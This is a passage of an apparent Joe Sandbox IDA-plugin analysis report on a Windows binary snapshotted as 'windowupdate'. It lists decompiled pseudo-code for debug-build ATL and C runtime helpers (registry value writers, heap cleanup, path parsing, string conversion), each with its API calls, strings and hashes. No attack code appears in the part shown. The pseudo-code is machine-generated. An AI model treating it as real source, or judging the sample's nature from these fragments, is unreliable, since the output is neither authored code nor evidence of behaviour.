                      				_v8 = 0;
                      				_v52 = 0;
                      				_t42 = E00D416D0(_a4,  &_v52,  &_v52, _a4, 0x2000);
                      				_t79 = _t78 + 0xc;
                      				_v60 = _t42;
                      				if(_v60 >= 0) {
                      					_v84 = _v52 + 0x24;
                      					E00DBF1D0(_v84);
                      					_v88 = _t79;
                      					_v28 = _t79;
                      					_t66 = _v84;
                      					E00DC13A0(_v88, _t66,  &_v76);
                      					_t25 =  &_v88;
                      					 *_t25 = _v88 + 0x20;
                      					__eflags =  *_t25;
                      					_v64 = _v88;
                      				} else {
                      					_t66 = 0;
                      					if(0 == 0 && L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlalloc.h", 0x272, 0, ?str?, 0xde40dc) == 1) {
                      						asm("int3");
                      					}
                      					_v37 = 0;
                      				}
                      				_v8 = 0xfffffffe;
                      				_push(_v37);
                      				E00DC13E0(_t52, _t75, 0xd31a58, _v76);
                      				_pop(_t49);
                      				_t68 = _t66;
                      				 *[fs:0x0] = _v20;
                      				_pop(_t72);
                      				_pop(_t74);
                      				_pop(_t53);
                      				return E00D47280(_t49, _t53, _v32 ^ _t75, _t68, _t72, _t74);
                      			}



































                      APIs
                        • Part of subcall function 00D416D0: _HRESULT_FROM_WIN32.LIBCMTD ref: 00D416E3
                      • @_RTC_AllocaHelper@12.LIBCMT ref: 00D319CD
                      Strings
                      • , xrefs: 00D319D2
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlalloc.h, xrefs: 00D31991
                      • %ls, xrefs: 00D31985
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AllocaHelper@12
                      • String ID: $%ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlalloc.h
                      • API String ID: 1877400981-3363187302
                      • Opcode ID: 012dd00eead2a87630d317240f17011ee3b1c246d0cb22e18e0e0bb1494bfc2e
                      • Instruction ID: 451544034ca1735fc6469dc95dd0134bc5b41d50d123f3b64a62134b9aeef54c
                      • Opcode Fuzzy Hash: 012dd00eead2a87630d317240f17011ee3b1c246d0cb22e18e0e0bb1494bfc2e
                      • Instruction Fuzzy Hash: 6C319C76E04349AFDB10DFD9DC92BEEBBB4EB48710F104129E502AB281D77559498BB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00DBFE00(void* __esi, WCHAR* _a4) {
                      				intOrPtr _v8;
                      				WCHAR* _v12;
                      				WCHAR* _v16;
                      				signed int _t24;
                      				signed int _t25;
                      				WCHAR* _t27;
                      				void* _t32;
                      				void* _t44;
                      				void* _t45;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_t47 = _a4;
                      				if(_a4 == 0) {
                      					_t32 = L00D84930(_t47, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1ca2, 0, L"%ls", L"lpszPathName != 0");
                      					_t45 = _t45 + 0x18;
                      					if(_t32 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_a4 != 0) {
                      					_v8 = _a4;
                      					_v12 = _a4;
                      					while(1) {
                      						__eflags =  *_v12 & 0x0000ffff;
                      						if(( *_v12 & 0x0000ffff) == 0) {
                      							break;
                      						}
                      						_t27 = CharNextW(_v12);
                      						__eflags = _t45 - _t45;
                      						_v16 = E00DC1520(_t27, _t45 - _t45);
                      						__eflags = ( *_v12 & 0x0000ffff) - 0x5c;
                      						if(( *_v12 & 0x0000ffff) == 0x5c) {
                      							L10:
                      							_v8 = _v16;
                      							L11:
                      							_v12 = _v16;
                      							continue;
                      						}
                      						__eflags = ( *_v12 & 0x0000ffff) - 0x2f;
                      						if(( *_v12 & 0x0000ffff) == 0x2f) {
                      							goto L10;
                      						}
                      						__eflags = ( *_v12 & 0x0000ffff) - 0x3a;
                      						if(( *_v12 & 0x0000ffff) != 0x3a) {
                      							goto L11;
                      						}
                      						goto L10;
                      					}
                      					_t24 = _v8 - _a4;
                      					__eflags = _t24;
                      					_t25 = _t24 >> 1;
                      					goto L13;
                      				} else {
                      					_t25 = 0;
                      					L13:
                      					return E00DC1520(_t25, _t44 - _t45 + 0xc);
                      				}
                      			}













                      APIs
                      • CharNextW.USER32(00000000), ref: 00DBFE6E
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00DBFE33
                      • lpszPathName != 0, xrefs: 00DBFE22
                      • %ls, xrefs: 00DBFE27
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CharNext
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$lpszPathName != 0
                      • API String ID: 3213498283-4001971154
                      • Opcode ID: 524647ada3d2708040df273fc9cf1a4065f47fdd5196a41c1305954c02332304
                      • Instruction ID: a4fa8b562bccd7e3470fa3742e4f951fd36b35eeb4c7e2046867613dd2548a4f
                      • Opcode Fuzzy Hash: 524647ada3d2708040df273fc9cf1a4065f47fdd5196a41c1305954c02332304
                      • Instruction Fuzzy Hash: CF215171E00219EFCB14DF99D881AFDBBB1EF45711F1480A9F8456B395D670DA80CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E00D36790(intOrPtr __ecx, void* __esi) {
                      				intOrPtr* _v8;
                      				intOrPtr* _v12;
                      				void* _t23;
                      				void* _t24;
                      
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t13 = _v8;
                      				 *_v8 = 0xdf0190;
                      				if(( *(_v8 + 8) & 0x000000ff) != 0) {
                      					_t13 = _v8;
                      					if( *(_v8 + 4) != 0) {
                      						_v12 = E00DC1520(HeapDestroy( *(_v8 + 4)), _t24 - _t24);
                      						_t29 = _v12;
                      						if(_v12 == 0) {
                      							_t13 = L00D84930(_t29, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlmem.h", 0x74, 0, "%ls", L"bSuccess");
                      							_t24 = _t24 + 0x18;
                      							if(_t13 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					}
                      				}
                      				return E00DC1520(_t13, _t23 - _t24 + 8);
                      			}








                      APIs
                      Strings
                      • %ls, xrefs: 00D367E9
                      • bSuccess, xrefs: 00D367E4
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h, xrefs: 00D367F2
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: DestroyHeap
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h$bSuccess
                      • API String ID: 2435110975-1732559737
                      • Opcode ID: 7b9f7d11584b00f8c9e25636889ef352ddea2d4d6e845fd37b03840707389f98
                      • Instruction ID: 7e0998fbc3768c15cfad66e42544022c700f0b3a6bfc7287ec609e145a9197a9
                      • Opcode Fuzzy Hash: 7b9f7d11584b00f8c9e25636889ef352ddea2d4d6e845fd37b03840707389f98
                      • Instruction Fuzzy Hash: A701B170E00319BFCB10EB98D846B5DBBB0AF44704F24C498E80427282D271DE40CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 35%
                      			E00D34740(void** __ecx, void* __esi, char* _a4, char* _a8, int _a12) {
                      				void** _v8;
                      				void* _t14;
                      				void* _t23;
                      				void* _t24;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				do {
                      					_t26 =  *_v8;
                      					if( *_v8 == 0) {
                      						_t14 = L00D84930(_t26, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x185e, 0, "%ls", L"m_hKey != 0");
                      						_t24 = _t24 + 0x18;
                      						if(_t14 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				return E00DC1520(E00DC1520(RegSetValueExA( *_v8, _a4, 0, 3, _a8, _a12), _t24 - _t24), _t23 - _t24 + 4);
                      			}








                      APIs
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00D34799
                      Strings
                      • %ls, xrefs: 00D3475C
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D34768
                      • m_hKey != 0, xrefs: 00D34757
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Value
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$m_hKey != 0
                      • API String ID: 3702945584-645619241
                      • Opcode ID: a32a1ae83a29d92cba9c2340302c94a8c3eadc1f7252eca4d6663f34fa05f3c4
                      • Instruction ID: 5261b519555614cfe992fd2f9fd1dc9be0f16e1759011cbc73dad9c50e985dcf
                      • Opcode Fuzzy Hash: a32a1ae83a29d92cba9c2340302c94a8c3eadc1f7252eca4d6663f34fa05f3c4
                      • Instruction Fuzzy Hash: B6018171E40219BFD724EB49DC43FAE7369EB55700F148158F504AB281E6B1AE0087F1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 35%
                      			E00D347C0(void** __ecx, void* __esi, char* _a4, char _a8) {
                      				void** _v8;
                      				void* _t13;
                      				void* _t21;
                      				void* _t22;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				do {
                      					_t24 =  *_v8;
                      					if( *_v8 == 0) {
                      						_t13 = L00D84930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1866, 0, "%ls", L"m_hKey != 0");
                      						_t22 = _t22 + 0x18;
                      						if(_t13 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				return E00DC1520(E00DC1520(RegSetValueExA( *_v8, _a4, 0, 4,  &_a8, 4), _t22 - _t22), _t21 - _t22 + 4);
                      			}








                      APIs
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00D34817
                      Strings
                      • %ls, xrefs: 00D347DC
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D347E8
                      • m_hKey != 0, xrefs: 00D347D7
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Value
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$m_hKey != 0
                      • API String ID: 3702945584-645619241
                      • Opcode ID: 151aa143387219f7b7da06444d55a8e3b3b12c1cafe6d251614ed577711b0b1f
                      • Instruction ID: 2ad3371a759b5a216fb8467be7121696ab34b16521ab0997bd303002eceb1972
                      • Opcode Fuzzy Hash: 151aa143387219f7b7da06444d55a8e3b3b12c1cafe6d251614ed577711b0b1f
                      • Instruction Fuzzy Hash: 90F0A471E40219BFD620FB49DC43F9E7368DB01750F104154F605AB281E6B1AE4087F5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 28%
                      			E00D33430(void* __esi, intOrPtr _a4) {
                      				intOrPtr _t9;
                      				void* _t12;
                      				void* _t14;
                      				void* _t21;
                      				void* _t22;
                      
                      				do {
                      					_t9 = _a4;
                      					_t23 =  *((intOrPtr*)(_t9 + 0x10));
                      					if( *((intOrPtr*)(_t9 + 0x10)) == 0) {
                      						_t14 = L00D84930(_t23, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xf0, 0, "%ls", L"pCache != 0");
                      						_t22 = _t22 + 0x18;
                      						if(_t14 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				if( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + 4)) != 0) {
                      					__imp__CoRevokeClassObject( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + 4)));
                      					__eflags = _t22 - _t22;
                      					_t12 = E00DC1520( *((intOrPtr*)(_a4 + 0x10)), __eflags);
                      				} else {
                      					_t12 = 0;
                      				}
                      				return E00DC1520(_t12, _t21 - _t22);
                      			}









                      APIs
                      • CoRevokeClassObject.OLE32(?), ref: 00D33483
                      Strings
                      • pCache != 0, xrefs: 00D3343D
                      • %ls, xrefs: 00D33442
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3344E
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ClassObjectRevoke
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$pCache != 0
                      • API String ID: 1224902704-3984120347
                      • Opcode ID: 4b029bc34c89dbf470b64212da472672e45d93704c5c459384e8d566cdccc923
                      • Instruction ID: 15830a69e9a670f61e3ab747a8121e1f0d2dbf4d8f1dbc96960d3f3ab963eff7
                      • Opcode Fuzzy Hash: 4b029bc34c89dbf470b64212da472672e45d93704c5c459384e8d566cdccc923
                      • Instruction Fuzzy Hash: A5F02435640315AFC724FF18D942F29B7A5EB54750F448454F8054B683E7B4EE80CAF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D59C10(intOrPtr _a4) {
                      				char _v8;
                      				intOrPtr _v12;
                      				char _v16;
                      				intOrPtr* _t13;
                      				intOrPtr _t26;
                      				intOrPtr _t27;
                      
                      				_t13 =  *0xf20640; // 0x0
                      				_v8 =  *_t13;
                      				if(_v8 == 0) {
                      					E00D4F350(_a4, 1);
                      					return _a4;
                      				}
                      				if(_v8 == 0x41) {
                      					_t26 =  *0xf20640; // 0x0
                      					_t27 = _t26 + 1;
                      					 *0xf20640 = _t27;
                      					_v16 = E00D50060("{flat}", 6);
                      					_v12 = _t27;
                      					E00D4F1F0(_a4,  &_v16);
                      					return _a4;
                      				}
                      				E00D4F350(_a4, 2);
                      				return _a4;
                      			}










                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D59C68
                      • DName::DName.LIBVCRUNTIMED ref: 00D59C77
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Name::$Node::makeStatus
                      • String ID: A${flat}
                      • API String ID: 3739413223-2440177573
                      • Opcode ID: a87fe204ca0450bb86dea8e88632d334dfdf2119954965c85ef11d66a4a176ba
                      • Instruction ID: db6226f7f18c69889c54b5b7baad8fb80ca48b6682373ea11de62686e428a5d8
                      • Opcode Fuzzy Hash: a87fe204ca0450bb86dea8e88632d334dfdf2119954965c85ef11d66a4a176ba
                      • Instruction Fuzzy Hash: 70016270904248EBDF14DF58C856BAD7FF4EB81301F1480A4FC4A5B292CA71AA5597A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 64%
                      			E00D4C8D0(intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16) {
                      				intOrPtr _v8;
                      				signed int _v12;
                      				char _v20;
                      				intOrPtr _v28;
                      				intOrPtr* _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				signed int _v48;
                      				intOrPtr _v52;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t90;
                      				intOrPtr _t94;
                      				void* _t133;
                      				intOrPtr _t158;
                      				intOrPtr _t180;
                      				void* _t187;
                      				void* _t189;
                      				signed int _t191;
                      				void* _t192;
                      
                      				_push(0xfffffffe);
                      				_push(0xdf3b80);
                      				_push(E00D49CD0);
                      				_push( *[fs:0x0]);
                      				_push(_t133);
                      				_push(_t189);
                      				_push(_t187);
                      				_t90 =  *0xdf600c; // 0x71e60372
                      				_v12 = _v12 ^ _t90;
                      				_push(_t90 ^ _t191);
                      				 *[fs:0x0] =  &_v20;
                      				_v28 = _t192 + 0xffffffe0;
                      				_v36 = 0;
                      				if(_a12[1] == 0 ||  *((char*)(_a12[1] + 8)) == 0 || _a12[2] == 0 && ( *_a12 & 0x80000000) == 0) {
                      					_t94 = 0;
                      				} else {
                      					if(( *_a12 & 0x80000000) == 0) {
                      						_v32 = _a8 + _a12[2] + 0xc;
                      					} else {
                      						_v32 = _a8;
                      					}
                      					_v8 = 0;
                      					if(( *_a12 & 0x00000080) == 0 || ( *_a16 & 0x00000010) == 0 ||  *0xf205e8 == 0) {
                      						_t144 =  *_a12 & 0x00000008;
                      						if(( *_a12 & 0x00000008) == 0) {
                      							if(( *_a16 & 0x00000001) == 0) {
                      								if(_a16[6] != 0) {
                      									if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
                      										L41:
                      										L00D90DE0(_t133, _t144, _t187, _t189);
                      									} else {
                      										_t144 = _a16;
                      										if(_a16[6] == 0) {
                      											goto L41;
                      										} else {
                      										}
                      									}
                      									if(( *_a16 & 0x00000004) == 0) {
                      										_v36 = 1;
                      									} else {
                      										_v36 = 2;
                      									}
                      								} else {
                      									if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
                      										L00D90DE0(_t133, _t144, _t187, _t189);
                      									}
                      									_v48 = _a16[5];
                      									_v52 = E00D4B310(_a4,  *((intOrPtr*)(_a4 + 0x18)),  &(_a16[2]));
                      									E00D4B590(_v32, _v52, _v48);
                      								}
                      							} else {
                      								_t148 = _a4;
                      								if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
                      									L00D90DE0(_t133, _t148, _t187, _t189);
                      								}
                      								E00D4B590(_v32,  *((intOrPtr*)(_a4 + 0x18)), _a16[5]);
                      								if(_a16[5] == 4 &&  *_v32 != 0) {
                      									 *_v32 = E00D4B310(_v32,  *_v32,  &(_a16[2]));
                      								}
                      							}
                      						} else {
                      							if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
                      								L00D90DE0(_t133, _t144, _t187, _t189);
                      							}
                      							 *_v32 =  *((intOrPtr*)(_a4 + 0x18));
                      							 *_v32 = E00D4B310(_v32,  *_v32,  &(_a16[2]));
                      						}
                      					} else {
                      						_t180 =  *0xf205e8; // 0x0
                      						_v40 = _t180;
                      						_t158 = _v40;
                      						 *0xdc62b0();
                      						_v44 = _v40();
                      						if(_v44 == 0 || _v32 == 0) {
                      							L00D90DE0(_t133, _t158, _t187, _t189);
                      						}
                      						 *_v32 = _v44;
                      						 *_v32 = E00D4B310( *_v32,  *_v32,  &(_a16[2]));
                      					}
                      					_v8 = 0xfffffffe;
                      					_t94 = _v36;
                      				}
                      				 *[fs:0x0] = _v20;
                      				return _t94;
                      			}


























                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: ce6875dca422289a43f7ca74727fa62ee4c31492c164c3b8df31d2b3e71ac704
                      • Instruction ID: 49beb2e13e377a32a3235878f643568e7a8ea166448f32137f0600a46c342945
                      • Opcode Fuzzy Hash: ce6875dca422289a43f7ca74727fa62ee4c31492c164c3b8df31d2b3e71ac704
                      • Instruction Fuzzy Hash: 58913774A11209DFCB44CF98D885BAAB7B1FB88305F289559E815AB391C734EC81CFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D400E0(void* __ebx, char** __ecx, void* __edi, void* __esi, short* _a4, int _a8) {
                      				char** _v8;
                      				signed int _v12;
                      				int _v16;
                      				char** _v20;
                      				char** _v24;
                      				int _v28;
                      				int _t54;
                      				char** _t55;
                      				long _t60;
                      				int _t62;
                      				int _t68;
                      				void* _t97;
                      				void* _t98;
                      
                      				_t93 = __edi;
                      				_t69 = __ebx;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				if(_a4 != 0) {
                      					_v12 = E00D85A70(_a4) + 1;
                      					_v16 = _v12 << 2;
                      					E00D42DE0(__ebx, __edi, __esi, _v8, _v16,  &(_v8[1]), 0x80);
                      					_t98 = _t98 + 0x14;
                      					_t95 = _t98;
                      					_t54 = WideCharToMultiByte(_a8, 0, _a4, _v12,  *_v8, _v16, 0, 0);
                      					__eflags = _t98 - _t98;
                      					_t55 = E00DC1520(_t54, _t98 - _t98);
                      					__eflags = _t55;
                      					if(_t55 != 0) {
                      						_v24 = 0;
                      					} else {
                      						_v24 = 1;
                      					}
                      					_t56 = _v24;
                      					_v20 = _v24;
                      					__eflags = _v20;
                      					if(_v20 != 0) {
                      						_t95 = _t98;
                      						_t60 = GetLastError();
                      						__eflags = _t98 - _t98;
                      						_t56 = E00DC1520(_t60, _t98 - _t98);
                      						__eflags = _t56 - 0x7a;
                      						if(_t56 == 0x7a) {
                      							_t62 = WideCharToMultiByte(_a8, 0, _a4, _v12, 0, 0, 0, 0);
                      							__eflags = _t98 - _t98;
                      							_v16 = E00DC1520(_t62, _t98 - _t98);
                      							E00D42DE0(_t69, _t93, _t98, _v8, _v16,  &(_v8[1]), 0x80);
                      							_t98 = _t98 + 0x10;
                      							_t95 = _t98;
                      							_t68 = WideCharToMultiByte(_a8, 0, _a4, _v12,  *_v8, _v16, 0, 0);
                      							__eflags = _t98 - _t98;
                      							_t56 = E00DC1520(_t68, _t98 - _t98);
                      							__eflags = _t56;
                      							if(_t56 != 0) {
                      								_v28 = 0;
                      							} else {
                      								_v28 = 1;
                      							}
                      							_v20 = _v28;
                      						}
                      					}
                      					__eflags = _v20;
                      					if(__eflags != 0) {
                      						__eflags =  &(_v8[1]);
                      						E00D42B10(_t93,  *_v8,  &(_v8[1]), 0x80);
                      						_t98 = _t98 + 0xc;
                      						_t56 = E00D32580(_t69,  *_v8, _t93, _t95);
                      					}
                      				} else {
                      					_t56 = _v8;
                      					 *_v8 = 0;
                      				}
                      				return E00DC1520(_t56, _t97 - _t98 + 0x18);
                      			}

















                      APIs
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00D37521,?,71E60372), ref: 00D4016A
                      • GetLastError.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,00D37521), ref: 00D4019D
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D401CB
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00D40215
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$ErrorLast
                      • String ID:
                      • API String ID: 1717984340-0
                      • Opcode ID: e7fb5f2a27bf28ca83dffa86de113f59c8ab95355328fe539ed6781eb7c6bdc6
                      • Instruction ID: 9f839e1b965dc33d5f52ec1a4cc5e1ed4557df0a1d4a6ee369127486e17c70c5
                      • Opcode Fuzzy Hash: e7fb5f2a27bf28ca83dffa86de113f59c8ab95355328fe539ed6781eb7c6bdc6
                      • Instruction Fuzzy Hash: FF511DB5E00209AFDB14DF98D886FAEBBB4EB48304F108158F605AB381D7759E40CBE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D9CFF0(char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				void* _t39;
                      				void* _t40;
                      				char* _t81;
                      
                      				if(_a4 != 0) {
                      					_t81 = _a4;
                      					__eflags =  *_t81;
                      					if( *_t81 != 0) {
                      						_t64 = _a12;
                      						_v8 = E00D9E680(_a12, _a16, _a4, 0, 0);
                      						__eflags = _v8;
                      						if(_v8 != 0) {
                      							__eflags = _v8 - E00D9E9E0(_a8);
                      							if(__eflags <= 0) {
                      								L12:
